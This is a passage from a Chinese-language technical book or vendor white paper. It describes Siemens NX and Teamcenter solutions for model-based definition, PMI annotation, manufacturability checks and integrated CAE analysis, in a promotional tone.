Integration,用户可以在其熟悉的Excel电子表格中进行数据的编辑、操纵和卷积计算,为整个团队提供统一的性能指标视图,实现性能指标与系统架构的关联。企业可以及时地评估需求的变更对系统指标的影响,对权衡选项进行评估分析,保持系统与性能目标的匹配。 5.虚拟试验 虚拟振动试验涉及有限元建模、系统级NVH、多体动力学、控制与电磁系统仿真、刚柔耦合分析、机电一体化分析、试验相关性分析与模型修正、多学科优化等,并且需要将这些学科结合起来,是一个典型的多学科综合仿真问题,因此虚拟振动试验的软件实施环境应该是能够涵盖这些学科的系统级平台。多学科系统级平台的优点是一方面能够在一个平台中解决所有问题,并且能够进行多学科综合仿真;另一方面能够避免多学科综合过程中复杂的数据传递和转换,最大限度地避免数据和精度损失。 虚拟振动试验系统的构建有两种方式,一种是基于线性有限元方法的开环虚拟振动试验系统建模,主要是进行系统级振动分析;另一种是基于多体动力学和机电联合仿真的闭环虚拟振动试验系统建模,主要是进行机电耦合分析和刚柔耦合分析。两种方法可以结合起来,互为补充,应用在不同的场合下。 基于线性有限元方法的开环虚拟振动试验系统框架如图3-7所示,振动台和试件的模型都是有限元模型,其本质是复杂有限元装配模型的强迫振动响应分析,从图中可以看出各模块在线性有限元方法中所起的作用。 机电联合分析方法的系统框架如图3-8所示,此方法涉及运动、结构、相关性和控制、电磁等软件模块支持。 为了实现真实完整的闭环控制,振动台机械部分采用多体动力学方法建立模型。如使用西门子公司的AMESim模块可以使振动控制器和电磁助动部分均基于AMESim控制、电磁库以及液压库建立,通过AMESim与虚拟仿真的无缝集成接口,将振动控制和电磁部分与振动台实现闭环(见图3-9)。 图3-7 基于线性有限元方法的开环虚拟振动试验系统 图3-8 机电联合仿真的虚拟振动试验系统 图3-9 闭环控制的虚拟振动试验系统示意图 3.3 价值定位 基于模型的系统工程为基于模型的工程、基于模型的制造、基于模型的维护等MBE企业的关键活动提供了统一的协调接口,是MBE企业研究和应用实践中的重要组成部分。集成、结构化和闭环的一体化环境可为复杂产品的研制提供一个独特的模型驱动的系统工程工作环境。在早期的概念设计阶段,可以通过模型对需求本身进行建模,对需求进行细化,把需求分解到各个部件的性能指标上去;在详细设计阶段,通过相应的测试解决方案,测试物理样机是不是满足需求。在产品开发的“V”形体系中,对每一个阶段均提供相应的验证:需求的验证、架构的验证、产品性能的验证、物理样机的验证等。基于模型可以尽早通过模拟分析发现大量不合理的设计方案;同时模型还为各方提供了一个公共通用的、无二义性的设计信息交流工具,这一点对复杂产品异地分布的系统设计尤其具有重要意义。 第4章 基于模型的三维产品设计解决方案 4.1 MBD模型定义的挑战 MBD技术的核心思想是:全三维基于特征的表述方法,基于三维主模型的过程驱动,融入知识工程和产品标准规范等。它用一个集成的三维实体模型来完整地表达产品定义信息,将制造信息和设计信息(三维尺寸标注及各种制造信息和产品结构信息)共同定义到产品的三维数字化模型中,从而取消二维工程图纸,保证设计和制造流程中数据的唯一性。 MBD技术不是简单地在三维模型上进行三维标注,它不仅会描述设计几何信息,而且会定义三维产品制造信息和非几何的管理信息(产品结构、PMI、BOM等)。它通过一系列规范的方法帮助客户更好地表达设计思想,具有更强的表现力,同时打破了设计制造的壁垒,其设计、制造特征能够方便地被计算机和工程人员解读,而不是像传统的定义方法只能被工程人员解读,这就有效地解决了设计/制造一体化的问题。 MBD模型的建立不仅仅是设计部门的任务,工艺、检验都要参与设计的过程,最后形成的MBD模型才能用于指导工艺制造与检验。MBD技术融入知识工程、过程模拟和产品标准规范等,将抽象、分散的知识集中在易于管理的三维模型中,设计、制造过程能有效地进行知识积累和技术创新,将成为企业知识固化和优化的最佳载体。 图4-1 MBD模型数据 MBD模型定义的挑战主要包括: ·MBD模型数据的完整表现。MBD模型数据(见图4-1)包括:设计模型、注释、属性,其中注释是不需要进行查询等操作即可见的各种尺寸、公差、文本、符号等;而属性则是为了完整地定义产品模型所需的尺寸、公差、文本等,这些内容在图形上是不可见的,但可通过查询模型获取。为了在模型三维空间很好地表达MBD模型数据,需要用有效的工具来进行描述,并按照一定的标准规范组织和管理这些数据,以便于MBD模型数据的应用(详见ASME14.41和ISO16792的描述)。 ·面向制造的设计。由于MBD模型是设计制造过程中的唯一依据,需要确保MBD模型数据的正确性。MBD模型数据的正确性反映在两个方面,一是MBD模型反映了产品的物理和功能需求,即客户需求的满足;二是可制造性,即创建的MBD模型能满足制造应用的需求,该MBD模型在后续可直接应用。 ·数字化协同设计与工艺制造的协同。MBD的重要特点之一是设计信息和工艺信息的融合与一体化,这就需要在产品设计和工艺设计之间进行及时的交流和沟通,构建协同的环境及相应的机制。 ·MBD模型的共享。通过MBD模型一次定义、多次多点应用,实现数据重用的最大化。 4.2 MBD模型定义的解决方案 针对MBD模型的定义,西门子工业软件公司提供了基于Teamcenter+NX集成一体化平台的解决方案,利用NX软件在MBD相关标准的规范下完成产品三维数字化数据定义;利用Teamcenter实现MBD数据的共享控制。 作为ASME Y14.41委员会的成员,以及ISO-16792标准的技术咨询组副主席,西门子工业软件公司提供的解决方案可帮助用户创建全面符合标准的MBD数据并实现共享。 西门子工业软件公司在其三维设计软件NX中内置了知识工程引擎,可帮助企业获取、转化、构建、保存和重用工程知识,实现基于知识工程的产品研发:NX提供重用库的功能,帮助企业管理和重用大量的工程数据,从而既提高产品研制的效率,又极大地降低成本,例如:直接基于已有的某产品型号数据,通过局部修改(部分零部件的替换,或部分零件的修改等)来完成新型号的设计;直接选用标准件数据(包括国标件和企标件等);直接基于已有的典型形状,在新产品的零件设计中进行模型的快速创建等。 NX的Check-Mate(一致性质量检查工具)通过可视化方式,对MBD模型数据的合规性和可制造性进行自动验证,确保MBD模型数据的正确性。 NX软件中的产品与制造信息(PMI)功能模块,使用户能够根据MBD标准在产品的三维几何模型基础上完成产品制造信息(尺寸标注、文字注释、几何形位公差等)的定义,从而实现数字化产品的完整定义。产品与制造信息(PMI)用于三维CAD及协同产品开发系统,旨在传递关于产品部件的制造信息,尤其是形位公差、三维注释(文本)、表面精度以及材料规格方面的信息。NX PMI完整三维注释环境不仅可以捕捉制造需求,在这些需求与三维模型之间建立关联关系,而且还允许下游应用软件重用数字化数据,这是因为数据不仅与产品零件共存,而且还由产品零件驱动。不仅如此,由于支持ASME Y14.41和ISO 16792定义的所有主要概念和要求,NX PMI里面完整的功能清单提供了目前CAD产品中最完整的工具组合。另外,针对NX PMI定义的产品制造信息,还可以通过Check-Mate工具对其正确性进行检查,从而进一步确保了MBD模型数据的正确性。 Teamcenter工程协同管理环境提供了对MBD模型数据及其创建过程的有效管理,包括MBD模型中的部分属性数据的控制,例如MBD数据的版本控制、审批发放记录等,这些数据虽然最终是在MBD模型数据中表现,但其输入则需要在Teamcenter环境中完成和控制。 1.基于知识工程的产品快速设计 三维设计软件NX中内置了知识工程引擎,帮助企业获取、转化、构建、保存和重用工程知识,实现基于知识工程的产品研发。知识是企业宝贵的智力资产,其内容包含: ·标准与规范。即产品研发中需遵循的约定和要求,例如国家标准、行业标准、企业标准等,其表现形式通常为文档资料。 ·典型流程和产品模板。针对典型产品研发的过程进行总结,它集中体现了产品研发过程中的实际经验,是多年的经验总结,典型流程是以指导书的形式供产品研发人员参阅,而产品模板则以可重用的典型产品数据的方式呈现。 ·过程向导。针对产品研发中的特定工作而开发的专用工具,该专用工具集成了企业产品开发的实际经验。在进行新产品开发时,该工具将一步一步引导产品研发人员完成相应工作,并获得需要的设计结果,从而使不具备丰富经验的研发人员也能开发出具有专业水准的产品,而具有丰富经验的人员则能更快地完成其工作。 ·重用库。即可重用的特征库和零件库等,为产品的模块化、系列化研发提供技术保障。 基于NX知识工程的产品研发应用场景如图4-2所示。 图4-2 基于知识工程的产品开发 设计人员利用知识工程完成产品开发的过程如下: ·设计人员接受设计任务。 ·从产品知识库中寻找最近完成的类似产品(即典型案例库),并以该产品为基础进行新产品的设计。 ·在产品设计过程中,设计人员将利用知识库,快速访问公司和行业标准(即标准和规范库),以及零部件等各种库(重用库),实现数据的重用,减少风险,使新设计的产品能符合公司和行业的规范。 ·针对一些典型零部件的设计,可以充分利用专家的知识和经验,例如,利用以专家知识为基础开发的专业工具(即过程向导库)来帮助快速、高质量地完成设计任务。 ·对完成的设计任务可以根据企业的检查工具对设计的结果进行质量检查,以确保设计的结果满足标准的要求。 ·在设计完成后,还可根据专家的建议,对设计的结果进行优化。 知识工程的应用将改变设计人员的传统工作模式,使设计人员的工作效率和质量产生质的飞跃。从上述内容可以看出,设计人员在完成设计任务时,并不是个人在独立完成设计任务,实际上他在利用其他人的头脑帮助他共同完成,从而使得设计过程从串行过渡到并行,到以知识重用的知识驱动方式,保证了产品研发的正确性和周期要求。 (1)产品的重用库——提高效率 为了便于管理企业大量的可重用数据,NX软件系统提供了NX重用库的功能。NX重用库能将各种标准件库、用户自定义特征库、符号库等无缝地集成在NX界面中,具有很好的开放性和可维护性,方便用户使用和维护,最终形成企业的各种重用库。 NX重用库支持的对象包括: ·行业标准部件和部件族。NX提供了轴承、螺栓、螺母、螺钉、销钉、垫片、结构件等280多类国标件,并可在后续根据产品设计部门的需求继续扩充。设计师也可自行创建需要的标准件并添加到库中进行管理。 ·通过PTS(Product Template Studio)定义的典型结构模板部件。 ·管线布置组件。管理并重用管材和标准件,例如各类管接头等。 ·用户定义特征。在创建模型时,经常会遇到多个部件具有类似形状的情况,这些特征绘制起来往往比较复杂,需花费大量时间。NX可将这些形状制作成用户自定义特征,并添加到重用库中,后续可直接由重用库快速创建这些特征。 ·规律曲线、形状和轮廓。针对以方程式表达的规律曲线,以及典型的形状(例如塑料件的卡扣、安装柱等),形成相应的库对象并实现数据重用。 ·2D截面。NX提供了一系列的二维截面库供设计师重用,这些截面均为全约束,设计师可方便调整尺寸及重定位。 ·制图定制符号。针对工程制图需要,定义和使用常用的特定符号。 重用库的使用。在产品设计中需要应用重用库中的对象时,通过拖拽的方式即可实现,例如,在重用库中选取所需的对象(例如螺钉),将其拖拽到NX软件的图形区,此时系统会自动弹出针对该系列螺钉的对话框,只要选取需要的规格参数,系统就能创建出所需要的对象。 (2)产品的设计模板——促进数据重用并提高效率 对于相似产品或者产品零部件的建模,设计师能借鉴已有的零部件修改来完成产品设计,这将大幅提升设计效率。但由于每个人的设计习惯不同以及庞大的模型特征树结构导致修改者难以理解设计意图,需花费大量时间在模型的修改上。NX创新的产品模板工作室(PTS)通过提供一个不需编程的、可视化的界面让用户理解设计者的意图,包装出一特定的界面,从而实现典型零部件的快速重用,大幅减少零部件修改所需的时间,提高三维设计效率。 (3)过程向导工具——实现知识的积累和重用 过程向导是将产品开发中的专家知识进行总结,然后以相应的工具进行表达,形成专用的工具,供技术人员使用。在使用过程中,系统将逐步提示技术人员完成相应的操作,得到最终所需的结果。利用过程向导工具,不具备专家经验的技术人员也能获得具有专家水准的操作结果,并能做到操作和结果的标准化,便于交流和数据的重用。 关于过程向导的知识管理实现技术途径如下: ·对典型流程进行总结和评审; ·确定过程向导开发的工具; ·创建过程向导的开发说明书; ·进行过程向导的开发; ·进行过程向导的测试; ·准备使用培训资料。 图4-3是一个过程向导的样例。在使用时,系统会根据操作的进程自动提示技术人员完成适当的操作,例如定义气道要求、截面形状等,然后自动创建所需的结果。 图4-3 过程向导样例 2.基于Check-Mate的一致性质量检查 MBD模型数据的合规性和可制造性检查是确保MBD产品设计质量的关键环节之一,为此,NX软件系统提供了Check-Mate工具,通过可视化的方式对MBD模型进行计算机自动检查。 Check-Mate对MBD模型进行的合规性检查(见图4-4),主要是检查三维设计是否是按照标准和规范来进行的,合规性检查涵盖零件和装配。 检查的内容包括(见图4-5): ·建模合规性; ·装配合规性; ·几何对象合规性; ·文件结构合规性及其他。 图4-4 合规性检查 图4-5 合规性检查内容 MBD模型的合规性检查的意义如下: ·确保产品设计遵循公司标准,因此促进整个产品开发的一致性; ·通过早期错误检测,避免在下游开发中修正错误需要消耗的成本与时间; ·减少有关工程更改单、保证修补和产品召回的成本。 针对MBD模型的可制造性检查,可采用集成于NX Check-Mate的DFMPro来进行。DFMPro是集成于NX系统的面向可制造性设计的计算机辅助工具,由Geometric公司研发。DFMPro能够辅助设计师在产品设计阶段就考虑设计的可制造性,通过对设计模型的可制造性检查和校验,避免后期制造阶段不必要的设计修改,提升设计质量,降低设计成本,加快产品研制的速度。 DFMPro的主要功能包括: ·机加工类产品设计。DFMPro支持对常见的机加工类产品设计的可制造性指导,可进行经济和快速的辅助机加工类产品设计,同时确保产品设计的质量品质。DFMPro提供的规则知识库支持铣削、车削、钻孔等常见的机加工产品设计,在机加工类产品设计过程中可有效地避免像小直径深孔、平底盲孔、不利于刀具路径的特征等设计约束问题。 ·钣金类产品设计。DFMPro提供对金属钣金类产品的设计指导,通过在早期识别设计缺陷以减少后续返工,降低设计成本。DFMPro支持常见的钣金设计准则,如孔与孔之间的最小距离,切口、槽、孔之间的有效距离,在同一方向的多个折弯,最小弯曲半径,最小尺寸开槽等。 ·注塑类产品设计。DFMPro提供对注塑类产品的设计指导,用户可通过DFMPro验证型腔表面形状、模具厚度、拔模角度、加强筋设置等注塑模具和产品的特征设计。 ·产品装配设计。DFMPro为系统装配设计提供自动化的装配信息检查能力,将设计师从繁琐耗时的人工检查工作中解放出来,显著提升装配设计的效率和质量,包括装配定位孔检查、间隙尺寸有效性检查、部件干涉批量检查等。 ·知识规则定制扩展。DFMPro为用户提供了知识获取的框架,用户可定制自己的企业知识以及工程师的产品设计最佳实践经验,实现知识共享。基于知识工程的先进知识获取框架,工程师可方便地定制自己的规则知识。依据企业现有的产品设计规范和实践可分类配置建立企业知识库。规则知识的定制不影响现有的CAD软件配置及使用方式。用户可定制产品设计过程的各种条件关系,包括几何特征和参数值之间的关系,设计分析输出与外部工具的关系,模型属性之间的关系等。 3.NX PMI完整三维注释环境 NX PMI把三维标注的功能集中在一个菜单选项下面,该菜单选项提供了使三维模型成为所有产品和制造数据知识库必需的所有工具(见图4-6)。PMI工具栏为创建、编辑和查询实体设计上的PMI提供了一个统一的界面。除了促进创建三维产品定义外,该工具还将检查模型是否符合ASME和ISO标准,让用户自行选择严格和宽松的符合性水平。 通过在三维注释与几何体的相应部分之间建立关联关系,设计人员可以把三维注释直接附在模型上,表明设计意图。创建注释的平面处于用户控制之下,用于定义阅读方向,以便放置注释。模型视图(Model Views,相当于ASME Y14.41里面的Saved Views)可用于管理模型上的注释,将其组织到与模型的一个特定取向或该模型的一种特定用途相关的信息集中。NX零件导航器(NX Part Navigator)可以把PMI注释组织到一个方便的位置,以便查看并调查其与模型几何体之间的关联性。 图4-6 NX中PMI模块启动、PMI下拉菜单和PMI视图关联管理 NX部件导航器提供了管理和组织PMI的工具: ·在模型视图节点中,可观察PMI对象; ·PMI节点显示关联的对象; ·选取盒子图标,显示或隐藏PMI对象; ·改变视图依存关系的选项,或使PMI在其他选取视图中显示的选项; ·PMI装配过滤器用于控制哪些部件的PMI对象在装配中可见。 NX PMI提供了全面的工具套件,可实现三维标注创建的全过程。 ·尺寸标注: ·在模型视图上任何选取的方位创建尺寸标注; ·类似于二维工程制图中的尺寸标注,PMI尺寸标按3D空间计算,放置在(或平行于)注释平面; ·PMI尺寸是三维的,可以具有第二延伸线; ·3D尺寸可以有或没有公差:有公差,没有公差,单面公差,名义尺寸,参考尺寸。 ·常用注释: PMI标注的不同类型,允许指定重要的制造需求。 ·文本注释; ·基准特征; ·基准目标; ·表面粗糙度; ·焊接; ·标号; ·客户化符号; ·补充几何区域(见图4-7); ·剖切。 图4-7 MBD模型补充几何注释 ·专门类型: 允许创建不同类型的PMI节点并将其赋予零件,用于信息沟通(见图4-8)。 ·坐标、通用和专用文本; ·企业编码; ·材料特性; ·零件编码; ·流程说明; ·URL文本; ·用户自定义; ·字串、实数和整数注释 ·安全标记(见图4-9): 图4-8 MBD模型专门类型注释 图4-9 MBD模型安全标记 当打开零件文件时,安全标记将被应用,并显示在信息窗口中。用户必须点取接受按钮,表明他们已阅读并接受了上述规定,零件才能被装载。 ·管理安全信息; ·公司所有权信息; ·导出控制。 ·信息和报表: PMI报表输出选项将基于工作零件中的所有PMI对象或选取的PMI对象,创建一个电子表格报表。 查找几何关联PMI,确定并选取几何关联的PMI对象。 4.集成的NX PMI愿景 在MBD模型定义过程中,随着工程师与设计人员在NX中不断向实体模型添加PMI信息,这些主模型变得越来越“智能化”,远远超出了只是单纯的几何表示,可明确嵌入设计意图,避免了因依赖人为推理产生的风险(因为这些模型将在所有下游过程中使用)。事实上这正是PMI的主要愿景:一次创建,随处使用(见图4-10)。 在集成的PMI愿景中,可以将产品的PMI信息,例如组件之间的安装与配合要求、子系统之间的接口关系等转换为系统能识别的需求检验项,与最终的设计结果相关联,确保设计输出满足需求。在NX中进行产品的细节设计时,该关联的需求将转换为产品数据的检测项,用于确保设计的结果满足要求。如果不满足要求,则不能通过相关检测,从而实现基于需求驱动的产品研发,满足面向制造的设计的要求。 图4-10 PMI的集成愿景 5.MBD数据重用 NX PMI完整三维注释环境不仅可以捕捉制造需求,在这些需求与三维模型之间建立关联关系,而且还允许下游应用软件重用数字化数据,实现产品研发的并行协同。这是因为数据不仅与产品零件共存,而且还由产品零件驱动。 ·通过协同,共享设计和制造信息。支持从NX中提取PMI信息到中性的JT文件,通过使用西门子工业软件公司的Teamcenter Visualization、XpressReview或JT2GO等直观查看应用软件,使制造企业能以一种低成本、高效率、低风险的方式,实现与其整个供应链的协同。 ·通过分析,验证产品可制造性。基于NX PMI完成了产品的MBD模型定义后,所有的零部件都包含产品制造信息(特别是公差信息),这些信息是否正确给定将直接影响产品最终的制造质量和成本。如果给定的公差精度太高,则可能增加制造困难,使制造成本增加;如果给定的公差精度太低,则可能使得生产出来的产品不满足功能要求。因而需要对产品设计的正确性进行提前确定。 为了对设计的结果进行分析,西门子工业软件公司的设计验证模块VSA可以直接读取从NX中提取了PMI信息的中性JT文件,并基于蒙特卡罗原理进行产品的验证分析,分析的结果包括:模拟最差状态分析、估算全部变化范围、鉴别影响因素。 通过验证分析,可以在产品设计的早期就识别潜在的问题,改进产品质量,实现面向制造的设计,其效益体现在以下几个方面: ·测试尺寸公差和几何形位公差应用的正确性; ·通过最差装配的模拟及影响因素的鉴别,明确地指示产品的设计是否满足生产要求; ·提供在产品设计早期就消除可能潜在的问题的方法; ·鉴别放松公差精度等级的机会,从而降低制造成本; ·减少工程更改,确保一次性正确制造。 ·基于PMI驱动的数控加工编程,过程如图4-11所示,它直接读取MBD模型的几何特征和产品制造信息,然后根据特征和产品制造信息自动选取适合的加工工艺,创建相应的加工刀具轨迹。 图4-11 基于PMI驱动的数控加工编程 系统识别的PMI信息包括:尺寸公差、表面粗糙度、表面属性和特征颜色等。 利用基于PMI驱动的数控加工编程,可以实现: ·更快速的NC编程,减少20%的编程时间; ·自动选取正确、优化的加工方法; ·优化的加工输出。 ·基于PMI的数控测量编程。基于MBD的数控检测的工作流程包括: ·根据MBD模型数据定义检测需求; ·确定检测规划,创建检测路径; ·模拟检测路径,避免干涉碰撞; ·检测程序后置输出(按DMIS格式); ·在测量机上运行检测程序,获得测量结果; ·对测量结果进行分析,并将测量结果和分析报告用于指导上游工作。 在进行数控检测编程时,通过Link to PMI功能,系统将自动识别三维模型上的特征和产品制造信息。 系统得到检测特征和公差信息后,将基于内置的检测规则自动创建所需要的测量路径,从而极大地提高数控测量编程的效率和质量。 6.NX与标准规范的结合 在MBD模型定义过程中,采用Teamcenter+NX集成一体化平台的解决方案,利用NX在MBD相关标准的规范下完成产品制造信息定义时,需要考虑: ·产品设计标准、准则如何集成到MBD中,例如尺寸公差、形位公差、技术要求、材料处理等标准数据; ·产品制造信息如何规范定义,例如沉头孔、埋头孔等,有一整套的标注规范,如何确保不同工程技术人员都能标注一致,产品制造信息通过PMI标注定义,不同模型的尺寸大小不一,需要定义PMI标注的尺寸与模型大小匹配; ·产品制造信息如何方便快捷地标注到确定标注平面,例如PMI标注在XC-YC平面。 为了实现NX与标准规范的有机结合,可以基于Teamcenter+NX平台进行定制开发,通过定制国标化、规范化、流程化、自动化的工具,帮助客户在已有的PMI技术基础上,方便快捷地完成MBD模型的定义。图4-12所示即是经过定制的MBDS设计工具,该工具的特点如下: 图4-12 MBDS设计工具 ·内嵌了MBD标准规范,创建的标注符合相关标准; ·集成了企业常用设计数据,通过图形化界面查询选用; ·采用对象组与模型视图复合结构组织管理三维产品制造信息; ·具有支持查询、统计、汇总三维产品制造信息的功能。 4.3 价值体现 基于Teamcenter+NX的MBD模型定义解决方案为实现基于MBD的三维数字化产品研发提供了工具保障。具体价值体现如下: ·NX知识工程应用,实现产品的快速设计。NX重用库帮助企业管理和重用大量的工程数据;产品设计模板实现典型零部件的快速重用;过程向导工具,实现知识的积累和应用。 ·NX的Check-Mate一致性质量检查,可通过可视化方式,对MBD模型数据的合规性和可制造性进行自动验证,确保MBD模型数据的正确性。 ·NX PMI提供了完整的三维注释环境。全面的工具套件,可保证MBD模型定义过程流畅;简单化的创建、放置和编辑,便于MBD模型的快速定义和PMI数据的有序管理。 ·Teamcenter提供了工程协同管理环境,对MBD模型数据及其创建过程的有效管理,便于设计制造的协同。 ·集成的NX PMI愿景,通过PMI的一次创建、多次多点应用,实现数据重用的最大化。 第5章 基于模型的设计分析应用解决方案 5.1 设计分析业务挑战 传统的设计产品分析都需要把CAD模型用通用格式如STEP、Parasolid、IGES等(也有人购买CAD软件的直接接口,会额外增加成本)从CAD软件中写出来,再导入CAE软件的前处理器中来划分网格。这样几何数据需要在不同公司的软件之间传递,会带来几何模型精度和完整性问题。比如,在CAD软件中产生的高精度曲面,导入到传统CAE软件的前处理器后要降阶,高精度曲面曲线就变成了折线和简单曲面,甚至有的CAE前处理器无法读入CAD模型,CAE工程师只得在这些CAE软件的前处理中建立非常简化的几何模型来进行分析(这是因为传统的CAE前后处理器没有专业级的几何建模工具,只有简单的几何模型创建功能),更不用说在原模型上的特征参数、注释和PMI信息了。分析工程师花费大量时间在几何模型的传递与处理上,造成分析跟不上设计节拍,分析与设计脱节,设计分析两张皮问题,从而导致CAE分析的价值不能充分发挥出来,严重影响对产品性能的及时验证和产品创新。企业迫切需要一个能完全基于设计模型的、设计分析能够联动的成熟解决方案来提高产品研发、制造生产的效率。 5.2 解决方案 大多数传统分析工具是一个拼凑在一起的解决方案。 基于模型的设计分析是新一代分析方法,要求所有的CAE分析都是完全基于设计模型的,即分析模型与设计模型完全一致与关联。设计模型的信息全部都能带入分析中,设计模型修改与更新,分析模型可以自动捕捉到设计的变化,可控地自动更新分析模型。设计更改了,分析的模型自动更新后,用户只需要简单提交求解,很快就能获得更新后的设计的分析结果。无论是单个零件模型还是复杂的装配的整机(系统)模型,设计变更后,只需自动更新有变化的几何模型相应的网格即可,不需要重新划分网格模型,从而极大地减少了重复劳动。 NX CAE是目前市面上唯一能实现完全基于模型的设计分析工具集合,它与NX CAD/CAM完全集成于一个环境NX中(见图5-1),实现了高端多学科多物理场分析(包括耦合分析)真正使用一个前后处理器(不是简单的封装),它颠覆了传统的CAE分析流程,从先进的软件工具层面实现了基于模型的设计分析方法与流程。 图5-1 设计与分析集成于一个环境NX中 NX CAE具有两类大的适用对象:广大产品设计与工艺设计工程师;专业CAE分析师。无论是设计与工艺设计工程师还是专业CAE分析师都共用一个前后处理界面,都基于模型进行产品分析。只是设计与工艺工程师和专业CAE分析师所分析的产品对象与学科不一样。设计工程师、工艺工程师通常只是对零部件(简单的套件合件等)进行常规的强度、刚度分析、模态分析、机构运动仿真和常规的热分析;专业CAE分析师主要针对复杂模型(整机、大的系统等)进行结构分析、非线性分析、振动噪声、流体分析、热分析、机构运动、烧蚀汽化、刚-柔联合仿真及非线性多体、机电液联合仿真、疲劳耐久性分析、拓扑优化、几何优化、形状优化、几何优化及系统优化,复合材料分析强度刚度失效分析、复合材料损伤破坏计算等。NX CAE真正能满足整个企业各个层面CAE分析的需要(见图5-2和图5-3),设计工程师、工艺工程师可利用NX CAE的智能化与自动化基于模型的网格划分工具来快速地完成仿真建模;专业分析师既可以利用自动化工具也可以利用手动辅助建模工具来按照自己的设想建立出“艺术化”模型。 图5-2 提供多学科多物理场统一环境下的仿真分析解决方案 图5-3 多学科多物理场统一环境下的NX CAE解算器 5.3 价值体现 NX CAE产品是完全集成在NX中的满足对产品进行多种学科分析验证的高端产品,具备实现基于模型的设计分析的必要与前提条件。用户在完成产品设计模型后,可直接在NX环境对该产品进行CAE建模与仿真分析。NX CAE具有高度自动化与智能化的FE建模能力,设计工程师、工艺工程师、专业CAE工程师都可以直接采用这种网格划分方式快速建模分析模型,比市面上其他CAE的前处理器工具网格划分时间可以缩短5~10倍甚至百倍,如图5-4所示。NX CAE的前后处理器中自带多种求解器对网格质量的要求标准,在自动划分网格过程中,实时检测网格质量以确保划分出来的网格满足求解器的要求,确保FE模型质量。NX CAE是多学科集成环境的平台级工具集合,无论客户进行结构分析静力(线性、非线性),非线性结构动力分析(隐式、显式),动力响应分析(瞬态、频率响应、冲击谱响应、DDAM、跌落、随机振动等),噪声分析,机构运动(刚性、刚柔联合、非线性多体、机构-控制联合等),疲劳耐久性分析,参数优化,拓扑优化,热分析,CFD,热-流耦合,热-结构耦合,热-流-结构耦合,流-结构-机构运动耦合分析,电子系统散热分析,空间系统热分析等,都可用统一前后处理器界面环境,跟NX CAD/CAM都是一样的操作风格。进行CAE分析时,不需要离开NX环境,直接基于设计模型,也不需要额外花费时间,就直接对设计的产品进行CAE仿真分析。NX CAE的求解器如NX Nastran、NX Durability、NX Optimization、NX Topology Optimization、NX ESC、NX TMG、NX Motion-Recurdyn、NX Response Simulation、NX Laminate Composite、FE-Model Correlation、FE-Model update等都提供了高速、高精度的求解能力。对于大规模问题的求解,用户可以直接设置并行计算(SMP、DMP);对于用模态叠加法求解的模态问题、动力响应问题,NX Nastran DMP RdMode提供了具有专业加速软件效率的并行算法,可以把基于模态叠加法的大规模问题的求解时间缩减几十倍;利用NX CAE自动化智能化的前后处理器与高速,高精度的解算器,用户在做设计的同时就直接对产品进行快速的仿真分析,对产品进行及时(实时)验证,确保产品质量和驱动产品创新。通过集成在Teamcenter for Simulation模块中,可以在Teamcenter环境直接对仿真数据与流程进行管理,可以利用HD-PLM将各种跟分析相关的信息(分析规范、流程规范、建模规范等)直接标注在分析模型上,任何有权限的用户都可以直接从模型上获得该分析模型的信息。对于已经成熟的产品类型,可以用NX Open定制分析流程模板,对于新来的人员或者以前没有做过该类产品分析的人员来说,可以通过流程模板,快速获得符合要求的分析结果。 作为新一代的基于模型的设计分析成熟解决方案,NX CAE具有领先于市面其他CAE工具的强大优势,能给企业带来独有的价值: ·高端的设计分析一体化。NX是目前全球唯一将高端CAD与高端CAE产品完全集成的产品(见图5-5),CAD与CAE一体化的重要好处是设计模型与分析模型同步关联,设计变更后,CAE模型可以自动捕捉到几何模型的变化,从而可控地自动更新。也就是说更改设计或者重用以前的设计,有限元模型不需要重新人工划分网格,这样能够快速获得新的模型的分析结果,极大地减少了重复建有限元模型的时间。 图5-4 NX CAE基于模型设计仿真与传统CAE工具效率对比 图5-5 被业界公认为最好的网格划分器 ·同步建模技术实现CAD模型来源的无关性。同步建模技术使得用户可以读入任何来源的CAD模型,且能识别、编辑修改几何特征,还能对特征进行再参数化,从而实现CAD软件的真正无关性,读入的CAD模型就像是NX自己创建的几何模型一样。利用特征定义、几何特征抑制、中曲面提取和装配等强大的模型抽象工具直接处理几何模型,极大地简化了前处理的工作量。同步建模技术非常容易掌握,不需CAD建模经验。 ·复杂流体域几何生成器。NX CAE前后处理器新增加自动流体域几何模型生成器Surface Wrap(见图5-6),利用该生成器用户通过简单的操作就能完成复杂流场几何的自动生成,通过解析度参数控制生成流体几何模型与结构模型的贴合程度。将过去流体域极难生成、需要耗费大量人力与时间的难题迎刃而解了,这将带动CFD分析效率的革命性进步。 图5-6 Surface Wrap快速生成流体几何 ·独有的装配有限元技术(AFEM)。NX高级有限元前后处理器不仅能对CAD模型进行装配管理,还能按CAD装配对有限元模型进行装配管理,这大大提高了系统级多零件有限元模型的生成效率。一个装配体可以由若干个分析人员同时并行地对各个零件进行多种网格划分,然后直接进行装配,同时保持CAD与有限元模型之间的协同性,即如果某几个零件的设计发生改变就可以快速地对有限元模型进行更新,而不需要重新导入几何和网格重划分,而且所有的材料属性与物理属性与几何和网格无关;此外,它可以在一个数据库中定义多种装配关系,包括一个零件的多种网格、一个系统的多种位置关系等,可以使复杂模型提高建模效率5~10倍。装配有限元技术颠覆了传统的CAE分析流程,传统CAE软件都是要等产品CAD模型装配好、写出Parasolid或者step等格式输出后,读入到传统的前后处理器中进行网格划分,这使得设计过程和分析过程是串行的。装配有限元技术可以使设计的零件做好,就可以对该零件直接划分网格,并根据需要可以单独对该零件进行计算,当产品零件都创建好后,再把这些零件装配在一起,原来零件的有限元模型可以自动随几何模型装配而自动跟随零件装配定位好,这使设计过程与分析工程融合,实时仿真,并可及时对设计进行校核验证。 ·完全图形界面支持的超单元定义。超单元是Nastran首创的功能,主要用来解决大模型分解计算以及不同单位数据协同时模型相关信息的保密问题。NX CAE新增超单元定义界面,通过装配有限元来定义超单元,使得超单元这一本来非常麻烦且易出错的定义变得完全在图形界面上完成,既简便又不会出差错,而且定义好的超单元可以用符号、简化模型和详细模型来显示。超单元技术使得复杂的大规模问题可以分解成若干相对小的子模型,单独计算这些子模型用的计算资源少,等这些子模型计算好后,把这些子模型按照超单元模式装配起来再计算整个模型时,可直接利用子模型的结果进行处理,这样利用较少的时间与计算机资源就能很快把大的模型计算完成,如图5-7所示。 图5-7 独有的超单元图形界面定义与显示技术 ·领先的模型连接与计算技术。NX CAE一方面可以让我们用金字塔单元,NX 